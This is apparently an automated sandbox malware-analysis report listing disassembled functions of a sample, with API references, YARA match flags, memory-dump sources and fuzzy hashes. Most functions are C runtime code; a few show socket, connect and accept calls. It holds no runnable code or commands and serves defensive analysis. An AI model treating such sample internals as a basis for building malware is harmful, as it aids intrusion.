                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                            • String ID:
                                            • API String ID: 3101085627-0
                                            • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                            • Instruction ID: 46e21124fff936a5cdcebdd9e5fbaec89d2b1eeecb34f02cb46047d6af39cf1d
                                            • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                            • Instruction Fuzzy Hash: BA319E32B00A44CAEB109FB5D89479D3376F788B88F410126EE0E97A29DF3CC54AC750
                                            Function 0078621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 0078624E
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00786245
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __doserrno.LIBCMT ref: 007862AB
                                            • _errno.LIBCMT ref: 007862B2
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00786316
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 388111225-0
                                            • Opcode ID: ea0d942e7f4d05c4406ce8f1ea8e5e2e8f056981f1351fad02dfabebb030488e
                                            • Instruction ID: 7802523f34284a219da6f1d0c995f28074039bcc40fea8256c6e60cffe1cf3cd
                                            • Opcode Fuzzy Hash: ea0d942e7f4d05c4406ce8f1ea8e5e2e8f056981f1351fad02dfabebb030488e
                                            • Instruction Fuzzy Hash: 08213A72750394D6C7167F76AC9A32D3A15B7C1BA0FD58129EE2217B92CB7CC882C710
                                            Function 007D6E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007D6E4E
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D6E45
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __doserrno.LIBCMT ref: 007D6EAB
                                            • _errno.LIBCMT ref: 007D6EB2
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D6F16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 388111225-0
                                            • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                            • Instruction ID: 21d543e34808e5194ea8b48402a5253822f08d86b170e4ed2e00bec71f23d0b8
                                            • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                            • Instruction Fuzzy Hash: 1C21F572710750D6C716AF75E88532D3A71BB81BA0FE54627EE2517792CB7CC882C720
                                            Function 0078F150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078F176
                                            • _errno.LIBCMT ref: 0078F16B
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1812809483-0
                                            • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                            • Instruction ID: dbad96ecc818bd7ffdda8285b834669ddccad490edaf76b193e99e44b109e7f6
                                            • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                            • Instruction Fuzzy Hash: 26412476A90399C6DF20BB22D5482AD76A0F755BE4FA04236EB9447B84D73CC8528700
                                            Function 007DFD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DFD76
                                            • _errno.LIBCMT ref: 007DFD6B
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1812809483-0
                                            • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                            • Instruction ID: abfac38bb35a4aa3eec2657031dadff5ca8724d1345d8afb8f19dfa94dee096f
                                            • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                            • Instruction Fuzzy Hash: 9A41377270439186DF20EB2295402BD37B1EB64BA4FA44237EB9647BA6D73CC9828710
                                            Function 007D027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007D0264: _mtinitlocknum.LIBCMT ref: 007D3DAA
                                              • Part of subcall function 007D0264: _amsg_exit.LIBCMT ref: 007D3DB6
                                            • DecodePointer.KERNEL32 ref: 007D02D8
                                            • DecodePointer.KERNEL32 ref: 007D02F6
                                            • EncodePointer.KERNEL32 ref: 007D0324
                                            • DecodePointer.KERNEL32 ref: 007D0339
                                            • EncodePointer.KERNEL32 ref: 007D0344
                                            • DecodePointer.KERNEL32 ref: 007D0356
                                            • DecodePointer.KERNEL32 ref: 007D0366
                                            • __crtCorExitProcess.LIBCMT ref: 007D03EA
                                            • ExitProcess.KERNEL32 ref: 007D03F2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                            • String ID:
                                            • API String ID: 1550138920-0
                                            • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                            • Instruction ID: 9512c96856bb3f9a180dbbaa08c9f90c893f17d67c95fdaa07cea900059a7313
                                            • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                            • Instruction Fuzzy Hash: AC41AD3160AB8486EB509F12F84432977B9F789BC4F44512AEE8E43B65DF7CD99AC700
                                            Function 007C6500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                            • String ID:
                                            • API String ID: 3339321253-0
                                            • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                            • Instruction ID: d030e29be8f3f18246d0ef7cedc611b78a2530feaf34576ab3717cd7c8c87aa5
                                            • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                            • Instruction Fuzzy Hash: 00314662318694D2DB249F21F994BAA6365F748B98F54012CDE0E477A9EF3CC65AC700
                                            Function 007C6B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C6BE0: htonl.WS2_32 ref: 007C6C3D
                                              • Part of subcall function 007C6BE0: select.WS2_32 ref: 007C6CAB
                                              • Part of subcall function 007C6BE0: __WSAFDIsSet.WS2_32 ref: 007C6CC3
                                              • Part of subcall function 007C6BE0: accept.WS2_32 ref: 007C6CE0
                                              • Part of subcall function 007C6BE0: ioctlsocket.WS2_32 ref: 007C6CF8
                                              • Part of subcall function 007C6BE0: __WSAFDIsSet.WS2_32 ref: 007C6D9B
                                            • GetTickCount.KERNEL32 ref: 007C6BAA
                                              • Part of subcall function 007C6F2C: malloc.LIBCMT ref: 007C6F5E
                                              • Part of subcall function 007C6F2C: htonl.WS2_32 ref: 007C6F91
                                              • Part of subcall function 007C6F2C: recvfrom.WS2_32 ref: 007C6FD5
                                              • Part of subcall function 007C6F2C: WSAGetLastError.WS2_32 ref: 007C6FE2
                                            • GetTickCount.KERNEL32 ref: 007C6BC2
                                            • GetTickCount.KERNEL32 ref: 007C70E0
                                            • GetTickCount.KERNEL32 ref: 007C70F6
                                            • shutdown.WS2_32 ref: 007C7115
                                            • shutdown.WS2_32 ref: 007C712A
                                            • closesocket.WS2_32 ref: 007C7134
                                            • free.LIBCMT ref: 007C7154
                                            • free.LIBCMT ref: 007C7169
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                            • String ID:
                                            • API String ID: 3610715900-0
                                            • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                            • Instruction ID: ae9ee4845d24cd6c100e15d5ebcd7fbc47dc32262bf9e2ff9858bdad4572092e
                                            • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                            • Instruction Fuzzy Hash: 40216232608A85C2DB289F66E985B296365F788F84F18812DCE4D87615DF3CD895CB11
                                            Function 00787008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 00787033
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 0078702B
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 00787077
                                            • _lseeki64_nolock.LIBCMT ref: 00787090
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                            • String ID:
                                            • API String ID: 4140391395-0
                                            • Opcode ID: d2043cf647e2d163a3c2a2dc567be0db299a39fca6af203152feee3ec89ee6f1
                                            • Instruction ID: c03bc60ed8853d7f27d303ae7f98438f331e3abf27e0fe8ab42eb982cc90739a
                                            • Opcode Fuzzy Hash: d2043cf647e2d163a3c2a2dc567be0db299a39fca6af203152feee3ec89ee6f1
                                            • Instruction Fuzzy Hash: F211E72278824485D7097F259C4A32DB911A780BF1FA94715AE3A073D1C77CC442C761
                                            Function 00786E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 00786EBB
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00786EB3
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 00786EFF
                                            • _lseek_nolock.LIBCMT ref: 00786F18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                            • String ID:
                                            • API String ID: 310312816-0
                                            • Opcode ID: 47749ff80f82cc4cc053cc521a19ae166eb4ca3a5f54a64a61986bb395727df3
                                            • Instruction ID: 66b6f8056e0210d2be6cb85e7eadc80c19f2bcd465ca38b19383889360cbab5a
                                            • Opcode Fuzzy Hash: 47749ff80f82cc4cc053cc521a19ae166eb4ca3a5f54a64a61986bb395727df3
                                            • Instruction Fuzzy Hash: 01112632B9068095D7027F65FC4A33D7A61BB807A1F9A4119FB190B3D2CB7CC882C724
                                            Function 007D7A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007D7ABB
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D7AB3
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D7AFF
                                            • _lseek_nolock.LIBCMT ref: 007D7B18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                            • String ID:
                                            • API String ID: 310312816-0
                                            • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                            • Instruction ID: 71d638107209372677b4fe5862aaa36372d5953e2e9f657b01d3527f1424fb05
                                            • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                            • Instruction Fuzzy Hash: F2119E72718640D6D70A6F65DC4933D7631BB807B1F9A4517EA190B3E2DB7CC881C320
                                            Function 007D7C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007D7C33
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D7C2B
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D7C77
                                            • _lseeki64_nolock.LIBCMT ref: 007D7C90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                            • String ID:
                                            • API String ID: 4140391395-0
                                            • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                            • Instruction ID: a9baa64aaa45fecb97fa789ab6da90720689e71b4b4d6b52addf9668be47da5d
                                            • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                            • Instruction Fuzzy Hash: F111E7227246409AD71A6F25D84932D7935BB80BB1F5A4716AE3D073D2EB7C8441C731
                                            Function 0077F36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                            • Instruction ID: 3770f5db00b98a46175e223110d261ef37c3c506888108760a83e80c30b95ec9
                                            • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                            • Instruction Fuzzy Hash: A1314D21B1AA41D2EF1AEF15ED6936C2360BBEABE0F4C8225D91E46661DF3CD544C312
                                            Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Address %p has no image-section, xrefs: 00401DC0
                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                            • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                            • Mingw-w64 runtime failure:, xrefs: 00401D88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: QueryVirtual
                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                            • API String ID: 1804819252-1534286854
                                            • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                            • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                                            • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                            • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                                            Function 00785834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 0078585F
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00785857
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 007858A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                            • String ID:
                                            • API String ID: 2611593033-0
                                            • Opcode ID: 8d3f92f90ff9cde3f8d463bec0bf82c50d6153501e501c1854d844cf26b3f735
                                            • Instruction ID: df25f955753fec16b7ae4930a0d25e46c40c5686e87725d486579a195fc0b14e
                                            • Opcode Fuzzy Hash: 8d3f92f90ff9cde3f8d463bec0bf82c50d6153501e501c1854d844cf26b3f735
                                            • Instruction Fuzzy Hash: 80113B32B84A84C6D7017F26EC4933D7A60A780BF1F9A4116EB151B3D2DB7CC842D720
                                            Function 007D6434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007D645F
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D6457
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D64A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                            • String ID:
                                            • API String ID: 2611593033-0
                                            • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                            • Instruction ID: 386f3e0b9d305e2f5610ff6d270dcf9c4d72e69a5c748db85755be09fc04b260
                                            • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                            • Instruction Fuzzy Hash: 2B117B3271428096D7166F25DD4933D3931BB80BB1F9A4517EA19073D2CB7CC881C731
                                            Function 007DA73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                            • String ID:
                                            • API String ID: 2289611984-0
                                            • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                            • Instruction ID: 95846235af91f90bb695bfe1416bb13cb8cfab69c543e81ca3fc7d8a7bdc9cac
                                            • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                            • Instruction Fuzzy Hash: CB113831700781E5D706AF75D88832D6675BB80B70F5A012BDA160B3A2DB7CC8829367
                                            Function 00785058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 00785079
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00785071
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 007850BD
                                            • _close_nolock.LIBCMT ref: 007850D0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                            • String ID:
                                            • API String ID: 4060740672-0
                                            • Opcode ID: f4fa1f50f73085aad1f766c2af42837c05f23a6bfd12aed5c0673392e7a8fc26
                                            • Instruction ID: 5fbda515a279ca3a563d1a1261fa182ce0a91480ba2289bcfd5b2c04e58fc51d
                                            • Opcode Fuzzy Hash: f4fa1f50f73085aad1f766c2af42837c05f23a6bfd12aed5c0673392e7a8fc26
                                            • Instruction Fuzzy Hash: CC114C32B84AC8C5D7057F75EC8D32C7A11B7817B1FAA5628EA1A073D2DB7CC8428764
                                            Function 007D5C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007D5C79
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D5C71
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D5CBD
                                            • _close_nolock.LIBCMT ref: 007D5CD0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                            • String ID:
                                            • API String ID: 4060740672-0
                                            • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                            • Instruction ID: 65317d59e25e50648948055492dec4db45efc9d13748c0b99d59900206b387af
                                            • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                            • Instruction Fuzzy Hash: 72110A32724B8097D3156F35DD9932C6A71BB80761F6A4627E91D073D2CB7CC4818734
                                            Function 00763A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 00763AA9
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 00763AB3
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • malloc.LIBCMT ref: 00763ABE
                                            • free.LIBCMT ref: 00763C7E
                                            • free.LIBCMT ref: 00763C86
                                            • free.LIBCMT ref: 00763C8E
                                              • Part of subcall function 007648F0: malloc.LIBCMT ref: 0076493A
                                              • Part of subcall function 007648F0: malloc.LIBCMT ref: 00764945
                                              • Part of subcall function 007648F0: free.LIBCMT ref: 00764A2C
                                              • Part of subcall function 007648F0: free.LIBCMT ref: 00764A34
                                            • free.LIBCMT ref: 00763C9A
                                            • free.LIBCMT ref: 00763CA7
                                            • free.LIBCMT ref: 00763CB4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$malloc$_errno$_callnewh
                                            • String ID:
                                            • API String ID: 4160633307-0
                                            • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                            • Instruction ID: e832e00d2937ad392101bdb56446232c2cdac69ccef313f5b7fddf82a478fd62
                                            • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
